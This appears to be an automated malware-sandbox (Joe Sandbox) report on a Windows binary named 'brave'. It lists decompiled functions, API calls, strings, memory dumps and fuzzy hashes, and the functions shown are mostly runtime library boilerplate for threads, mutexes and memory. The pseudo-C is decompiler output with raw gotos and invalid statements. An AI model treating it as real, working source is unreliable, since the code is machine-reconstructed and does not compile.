0x7ff652b526ed
0x7ff652b526ef
0x7ff652b52700
0x7ff652b52702
0x7ff652b52713
0x7ff652b52715
0x7ff652b5271e
0x7ff652b52726
0x7ff652b5272e
0x7ff652b5273d
0x7ff652b52747
0x7ff652b52752
0x7ff652b52757
0x7ff652b52761
0x7ff652b52763
0x7ff652b5276a
0x7ff652b52771
0x7ff652b52784
0x7ff652b52789
0x7ff652b52794
0x7ff652b5279f
0x7ff652b527a7
0x7ff652b527ab
0x7ff652b527af

APIs

Part of subcall function 00007FF652B519A0: malloc.MSVCRT(?,?,?,?,00007FF652B523B5,?,?,?,?,00007FF652B23C24), ref: 00007FF652B519B1

Part of subcall function 00007FF652B4A110: strlen.MSVCRT ref: 00007FF652B4A13B

Part of subcall function 00007FF652B2FEC0: RtlCaptureContext.KERNEL32 ref: 00007FF652B2FF45
Part of subcall function 00007FF652B2FEC0: RtlUnwindEx.KERNEL32 ref: 00007FF652B2FF63
Part of subcall function 00007FF652B2FEC0: abort.MSVCRT ref: 00007FF652B2FF69

Part of subcall function 00007FF652B4A290: strlen.MSVCRT ref: 00007FF652B4A2BB

Part of subcall function 00007FF652B4A7A0: strlen.MSVCRT ref: 00007FF652B4A7CB

Part of subcall function 00007FF652B49850: strlen.MSVCRT ref: 00007FF652B4987B

Part of subcall function 00007FF652B4A970: strlen.MSVCRT ref: 00007FF652B4A99B

Part of subcall function 00007FF652B4AAF0: strlen.MSVCRT ref: 00007FF652B4AB1B

malloc.MSVCRT ref: 00007FF652B52752

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: strlen$malloc$CaptureContextUnwindabort
String ID:
API String ID: 3412053993-0
Opcode ID: f0681c3af7f834308cd656b74fdb5bd540acaac29b47731a026287562199051c
Instruction ID: 42848bb5444e312c035b5405a347bb425ecc648fe4771936f0a20160452651c9
Opcode Fuzzy Hash: f0681c3af7f834308cd656b74fdb5bd540acaac29b47731a026287562199051c
Instruction Fuzzy Hash: 97616260B1A64640FA14AB16FC553B66361BF47BCCF481531ED8DAB393EEBCE0459384

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B52530 Relevance: 1.4, APIs: 1, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00007FF67FF652B52530() {
				long long _v184;
				void* _t39;
				void* _t41;
				void* _t42;
				int _t44;
				long long* _t53;
				void* _t54;
				void* _t55;
				void* _t92;
				int _t93;
				int _t94;
				int _t95;

				E00007FF67FF652B519A0(_t41, _t42, _t44, _t55);
				_t93 = _t44;
				E00007FF67FF652B4A7A0(_t44, _t55);
				E00007FF67FF652B52160(0x10, _t39, _t44, _t54, _t93, 0x52dd6c10, 0x7ff652b4a8d0, _t92, _t93, _t55);
				_t98 = _t44;
				E00007FF67FF652B51CF0(_t93);
				E00007FF67FF652B2FEC0();
				_push(_t44);
				_push(_t93);
				E00007FF67FF652B519A0(_t41, _t42, _t44, _t98);
				_t94 = _t44;
				E00007FF67FF652B49850(_t44, _t98);
				E00007FF67FF652B52160(0x10, _t39, _t44, _t54, _t94, 0x52dd6b70, 0x7ff652b49970, _t92, _t94, _t98);
				_t100 = _t44;
				E00007FF67FF652B51CF0(_t94);
				E00007FF67FF652B2FEC0();
				_push(_t44);
				_push(_t94);
				E00007FF67FF652B519A0(_t41, _t42, _t44, _t100);
				_t95 = _t44;
				E00007FF67FF652B4A970(_t44, _t100);
				E00007FF67FF652B52160(0x10, _t39, _t44, _t54, _t95, 0x52dd6c30, 0x7ff652b4aa90, _t92, _t95, _t100);
				_t102 = _t44;
				E00007FF67FF652B51CF0(_t95);
				E00007FF67FF652B2FEC0();
				_push(_t44);
				E00007FF67FF652B519A0(_t41, _t42, _t44, _t102);
				_t96 = _t44;
				E00007FF67FF652B4AAF0(_t44, _t102);
				E00007FF67FF652B52160(0x10, _t39, _t44, _t54, _t44, 0x52dd6c50, 0x7ff652b4ac10, _t92, _t44, _t102);
				E00007FF67FF652B51CF0(_t96);
				E00007FF67FF652B2FEC0();
				_v184 = 0;
				asm("ud2");
				_v184 = 0;
				asm("ud2");
				_v184 = 0;
				asm("ud2");
				_v184 = 0;
				asm("ud2");
				 *0 = 0;
				asm("ud2");
				_v184 = 0;
				asm("ud2");
				_v184 = 0;
				asm("ud2");
				_v184 = 0;
				asm("ud2");
				_v184 = 0;
				asm("ud2");
				_v184 = 0;
				_t53 =  *0x10;
				asm("ud2");
				0;
				E00007FF67FF652B30980(0x52dd2d20, 0x52dd6c50);
				 *0x52dd2d38 = 0x12400; // executed
				malloc(_t95); // executed
				 *0x52dd2d30 = _t53;
				if (_t53 == 0) goto 0x52b52789;
				 *0x52dd2d28 = _t53;
				 *_t53 = 0x12400;
				 *((long long*)(_t53 + 8)) = 0;
				goto E00007FF67FF652B21520;
				 *0x52dd2d38 = 0;
				 *0x52dd2d28 = 0;
				goto 0x52b52779;
				0;
				0;
				0;
			}

0x7ff652b52540
0x7ff652b5254b
0x7ff652b5254e
0x7ff652b52564
0x7ff652b52569
0x7ff652b5256f
0x7ff652b52577
0x7ff652b52580
0x7ff652b52582
0x7ff652b52590
0x7ff652b5259b
0x7ff652b5259e
0x7ff652b525b4
0x7ff652b525b9
0x7ff652b525bf
0x7ff652b525c7
0x7ff652b525d0
0x7ff652b525d2
0x7ff652b525e0
0x7ff652b525eb
0x7ff652b525ee
0x7ff652b52604
0x7ff652b52609
0x7ff652b5260f
0x7ff652b52617
0x7ff652b52620
0x7ff652b52630
0x7ff652b5263b
0x7ff652b5263e
0x7ff652b52654
0x7ff652b5265f
0x7ff652b52667
0x7ff652b52670
0x7ff652b52681
0x7ff652b52683
0x7ff652b52694
0x7ff652b52696
0x7ff652b526a7
0x7ff652b526a9
0x7ff652b526ba
0x7ff652b526bc
0x7ff652b526c7
0x7ff652b526c9
0x7ff652b526da
0x7ff652b526dc
0x7ff652b526ed
0x7ff652b526ef
0x7ff652b52700
0x7ff652b52702
0x7ff652b52713
0x7ff652b52715
0x7ff652b5271e
0x7ff652b52726
0x7ff652b5272e
0x7ff652b5273d
0x7ff652b52747
0x7ff652b52752
0x7ff652b52757
0x7ff652b52761
0x7ff652b52763
0x7ff652b5276a
0x7ff652b52771
0x7ff652b52784
0x7ff652b52789
0x7ff652b52794
0x7ff652b5279f
0x7ff652b527a7
0x7ff652b527ab
0x7ff652b527af

APIs

Part of subcall function 00007FF652B519A0: malloc.MSVCRT(?,?,?,?,00007FF652B523B5,?,?,?,?,00007FF652B23C24), ref: 00007FF652B519B1

Part of subcall function 00007FF652B4A7A0: strlen.MSVCRT ref: 00007FF652B4A7CB

Part of subcall function 00007FF652B2FEC0: RtlCaptureContext.KERNEL32 ref: 00007FF652B2FF45
Part of subcall function 00007FF652B2FEC0: RtlUnwindEx.KERNEL32 ref: 00007FF652B2FF63
Part of subcall function 00007FF652B2FEC0: abort.MSVCRT ref: 00007FF652B2FF69

Part of subcall function 00007FF652B49850: strlen.MSVCRT ref: 00007FF652B4987B

Part of subcall function 00007FF652B4A970: strlen.MSVCRT ref: 00007FF652B4A99B

Part of subcall function 00007FF652B4AAF0: strlen.MSVCRT ref: 00007FF652B4AB1B

malloc.MSVCRT ref: 00007FF652B52752

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: strlen$malloc$CaptureContextUnwindabort
String ID:
API String ID: 3412053993-0
Opcode ID: 93d5ee2c6aaf0008122d9e70a301f82916df8bd8c2d61856d1b3d42c2f024549
Instruction ID: 1f19ba949ddc525fc67859b829e1c1427aaccb573334c30c83d17c2a4c9e36b7
Opcode Fuzzy Hash: 93d5ee2c6aaf0008122d9e70a301f82916df8bd8c2d61856d1b3d42c2f024549
Instruction Fuzzy Hash: 58517431B0A64680FA14AB16FC953B62361BF46B8CF481535ED8DAB392DEBCE1448384

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B37060 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 157
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF652B37068
CreateMutexA.KERNEL32 ref: 00007FF652B37177
WaitForSingleObject.KERNEL32 ref: 00007FF652B37188
FindAtomA.KERNEL32 ref: 00007FF652B3719D
AddAtomA.KERNEL32 ref: 00007FF652B371DD
_onexit.MSVCRT ref: 00007FF652B371FA
ReleaseMutex.KERNEL32 ref: 00007FF652B37202
CloseHandle.KERNEL32 ref: 00007FF652B3720B

Strings

__shmem3_winpthreads_tdm_-aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAaaAaAaaAaAAaAAAAaaaaAaAaaaaaaaaa, xrefs: 00007FF652B370DB, 00007FF652B37196, 00007FF652B371D6, 00007FF652B37227
__shmem3_winpthreads_tdm_, xrefs: 00007FF652B370B7, 00007FF652B370E7
aaaaaaaa, xrefs: 00007FF652B3711E
OmBdAaAa__shmem3_winpthreads_tdm_, xrefs: 00007FF652B3706E, 00007FF652B3712F
failed to to lock creation mutex, xrefs: 00007FF652B372D6
failed to get string from atom, xrefs: 00007FF652B372F6
failed to add string to atom table, xrefs: 00007FF652B372C3
aaaaaaaa, xrefs: 00007FF652B37114

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: AtomMutex$CloseCreateCurrentFindHandleObjectProcessReleaseSingleWait_onexit
String ID: OmBdAaAa__shmem3_winpthreads_tdm_$__shmem3_winpthreads_tdm_$__shmem3_winpthreads_tdm_-aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAaaAaAaaAaAAaAAAAaaaaAaAaaaaaaaaa$aaaaaaaa$aaaaaaaa$failed to add string to atom table$failed to get string from atom$failed to to lock creation mutex
API String ID: 2382646235-3559936951
Opcode ID: a7566c4363776fb2f142f84513ee5a94bc791e29e32db4c34a702c3beaa6482f
Instruction ID: d813b484d16256a284924059bde4529bc0931010a3efb5a9651748dc5c1270ed
Opcode Fuzzy Hash: a7566c4363776fb2f142f84513ee5a94bc791e29e32db4c34a702c3beaa6482f
Instruction Fuzzy Hash: 2E616F75B08A4382EB058B24EC052B977A1BF6678DF4C4335C94EEB294EEFCE9459310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B33520 Relevance: 24.4, APIs: 16, Instructions: 450
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF652B33520(void* __edx, void* __r8) {

				if (__edx != 0) goto 0x52b33548;
				if (__r8 == 0) goto 0x52b33588;
				return 1;
			}

0x7ff652b3352d
0x7ff652b33532
0x7ff652b33544

APIs

RemoveVectoredExceptionHandler.KERNEL32 ref: 00007FF652B33594
TlsGetValue.KERNEL32 ref: 00007FF652B335ED
CloseHandle.KERNEL32 ref: 00007FF652B3362B
CloseHandle.KERNEL32 ref: 00007FF652B33638
TlsSetValue.KERNEL32 ref: 00007FF652B336A5

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: CloseHandleValue$ExceptionHandlerRemoveVectored
String ID:
API String ID: 2941551293-0
Opcode ID: 67c97d2b0fe632f4fb20c12def0e5228ddbe2ecb36f3870be98da43108ad0dd3
Instruction ID: 6b98a16332517e6ee9d7f7ab4a1511bf93a029ab51f733449a6a1f5c9a1219f6
Opcode Fuzzy Hash: 67c97d2b0fe632f4fb20c12def0e5228ddbe2ecb36f3870be98da43108ad0dd3
Instruction Fuzzy Hash: 3F224C21A09B0A86EA589B19DC5477A23A0FF66B9CF4D0335DA1DA7391DFBCE444C390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B36F70 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 60
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNEL32 ref: 00007FF652B36F81
WaitForSingleObject.KERNEL32 ref: 00007FF652B36F92
FindAtomA.KERNEL32 ref: 00007FF652B36FFF
ReleaseMutex.KERNEL32 ref: 00007FF652B3700D
CloseHandle.KERNEL32 ref: 00007FF652B37016
CloseHandle.KERNEL32 ref: 00007FF652B37037

Strings

__shmem3_winpthreads_tdm_-aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAaaAaAaaAaAAaAAAAaaaaAaAaaaaaaaaa, xrefs: 00007FF652B36FF8
OmBdAaAa__shmem3_winpthreads_tdm_, xrefs: 00007FF652B36F7A
failed to to lock cleanup mutex, xrefs: 00007FF652B37028

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: CloseHandleMutex$AtomCreateFindObjectReleaseSingleWait
String ID: OmBdAaAa__shmem3_winpthreads_tdm_$__shmem3_winpthreads_tdm_-aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAaaAaAaaAaAAaAAAAaaaaAaAaaaaaaaaa$failed to to lock cleanup mutex
API String ID: 3776795807-1562759706
Opcode ID: f862491ff4c3ba5945405b97c927dcecf34c299a1984f3d4105c76ec3890af5a
Instruction ID: 5750099929455b0b9ab25f9f7b34b412790d12909d1972382bdd31f2a281c23a
Opcode Fuzzy Hash: f862491ff4c3ba5945405b97c927dcecf34c299a1984f3d4105c76ec3890af5a
Instruction Fuzzy Hash: 42216661B09A4382EE559B51EC5813873A1BF55B8DB4C9735C80DEB390EEFCE855C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B32D40 Relevance: 16.7, APIs: 11, Instructions: 179
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E00007FF67FF652B32D40(void* __ecx, void* __rdx) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r12;
				void* _t6;
				void* _t9;
				void* _t10;
				void* _t11;
				intOrPtr _t18;
				intOrPtr _t19;
				void* _t22;
				void* _t26;
				intOrPtr* _t27;
				void* _t28;
				void* _t30;
				void* _t31;
				void* _t32;

				_t27 =  *0x52dd6920; // 0x7ff652de1400
				_t18 =  *_t27;
				if (_t18 == 0) goto 0x52b32f30;
				if ( *((long long*)(_t18 + 0x28)) != 0) goto 0x52b32f18;
				 *((long long*)(_t18 + 0x28)) = 0x52de13c8;
				if ( *0x52de13c8 == 1) goto 0x52b32f25;
				E00007FF67FF652B32350(_t9, _t10, _t11,  *0x52de13c8 - 1, _t18, _t22, 0x52de13c8, _t26, _t27, _t28, _t30, _t31, _t32);
				_t19 =  *_t27;
				if (_t19 == 0) goto 0x52b32dc0;
				if ( *((long long*)(_t19 + 0x30)) != 0) goto 0x52b32de0;
				 *((long long*)(_t19 + 0x30)) = 0x52dd2bd8;
				_t6 = TlsGetValue(??);
				if (0x52dd2bd8 == 0) goto 0x52b32df4;
				return _t6;
			}

0x7ff652b32d4a
0x7ff652b32d51
0x7ff652b32d57
0x7ff652b32d62
0x7ff652b32d72
0x7ff652b32d76
0x7ff652b32d7c
0x7ff652b32d81
0x7ff652b32d87
0x7ff652b32d8e
0x7ff652b32d97
0x7ff652b32da0
0x7ff652b32dac
0x7ff652b32dbb

APIs

TlsGetValue.KERNEL32 ref: 00007FF652B32DA0

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7a2b5f52572ddb7f3fab963f5045169fe13579b7e3dcc0f1855f9a6abb98b3e6
Instruction ID: 0fca78a326557cf8ff935872b97386f55c4ffcf4c8aef686afa14d7cf4b163ce
Opcode Fuzzy Hash: 7a2b5f52572ddb7f3fab963f5045169fe13579b7e3dcc0f1855f9a6abb98b3e6
Instruction Fuzzy Hash: D3711972A09B0686EF609F25EC5436976A0FF56B9CF484235CA5DA7391DFBCE844C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B24090 Relevance: 13.6, APIs: 4, Strings: 5, Instructions: 129
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcslen.MSVCRT ref: 00007FF652B240C1
wcslen.MSVCRT ref: 00007FF652B24117

Part of subcall function 00007FF652B4DEF0: memcpy.MSVCRT ref: 00007FF652B4DF96
Part of subcall function 00007FF652B4DEF0: memcpy.MSVCRT ref: 00007FF652B4DFC1

wcslen.MSVCRT ref: 00007FF652B241B7
memcpy.MSVCRT ref: 00007FF652B242E6

Strings

, xrefs: 00007FF652B241CE
0, xrefs: 00007FF652B24260
basic_string::_M_construct null not valid, xrefs: 00007FF652B24300
@, xrefs: 00007FF652B2426B
\??\, xrefs: 00007FF652B24110, 00007FF652B24129

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: memcpywcslen
String ID: $0$@$\??\$basic_string::_M_construct null not valid
API String ID: 982415701-2971582370
Opcode ID: b5d247323698149d340c130ac0e6dd9a73dea5bbab17d57a17569d1199411ecf
Instruction ID: 53aa42bd64509693ebb68ac6d00affec1fc9058524b15ef2484df732e54d7fbc
Opcode Fuzzy Hash: b5d247323698149d340c130ac0e6dd9a73dea5bbab17d57a17569d1199411ecf
Instruction Fuzzy Hash: CC610472618BC185E7708B15F8503AAB7A1FBC5788F488225DACC97B99DFBCD049CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B30230 Relevance: 12.1, APIs: 8, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00007FF67FF652B30230(intOrPtr* __rax, void* __rcx) {
				void* _t5;
				intOrPtr _t6;
				intOrPtr* _t11;
				intOrPtr _t13;

				_t11 = __rax;
				_t13 =  *((intOrPtr*)(__rcx + 0x10));
				if (_t13 == 0) goto 0x52b30288;
				_t6 =  *0x52de1370; // 0x1
				_t5 = E00007FF67FF652B35260(_t6, __rax);
				if (_t11 == 0) goto 0x52b302c8;
				if ( *_t11 - _t13 < 0) goto 0x52b30370;
				if ( *((intOrPtr*)(_t11 + 8 + (_t13 - 1) * 8)) == 0) goto 0x52b30310;
				return _t5;
			}

0x7ff652b30230
0x7ff652b3023a
0x7ff652b30244
0x7ff652b30246
0x7ff652b3024c
0x7ff652b30257
0x7ff652b3025f
0x7ff652b30271
0x7ff652b30284

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1187da6e171b2e77c5614d760d31e22034ad26bdc6425de355795f4ea1b5fa90
Instruction ID: 07c0b0b5a713f0990f4e352909359240479ce8cc55c3c79bdbf9ecfd56f8dad1
Opcode Fuzzy Hash: 1187da6e171b2e77c5614d760d31e22034ad26bdc6425de355795f4ea1b5fa90
Instruction Fuzzy Hash: 3B51A122B19A0682EF159F15DC405B833A4FF66B8CF9C8A35D98CA7391DEBCE545C350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B239D0 Relevance: 12.1, APIs: 3, Strings: 5, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcslen.MSVCRT ref: 00007FF652B23A58

Part of subcall function 00007FF652B4DEF0: memcpy.MSVCRT ref: 00007FF652B4DF96
Part of subcall function 00007FF652B4DEF0: memcpy.MSVCRT ref: 00007FF652B4DFC1

wcslen.MSVCRT ref: 00007FF652B23AE6
memcpy.MSVCRT ref: 00007FF652B23BFE

Strings

@, xrefs: 00007FF652B23B55
0, xrefs: 00007FF652B23B4A
basic_string::_M_construct null not valid, xrefs: 00007FF652B23C18
, xrefs: 00007FF652B23AEB
\??\, xrefs: 00007FF652B23A51, 00007FF652B23A6A

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
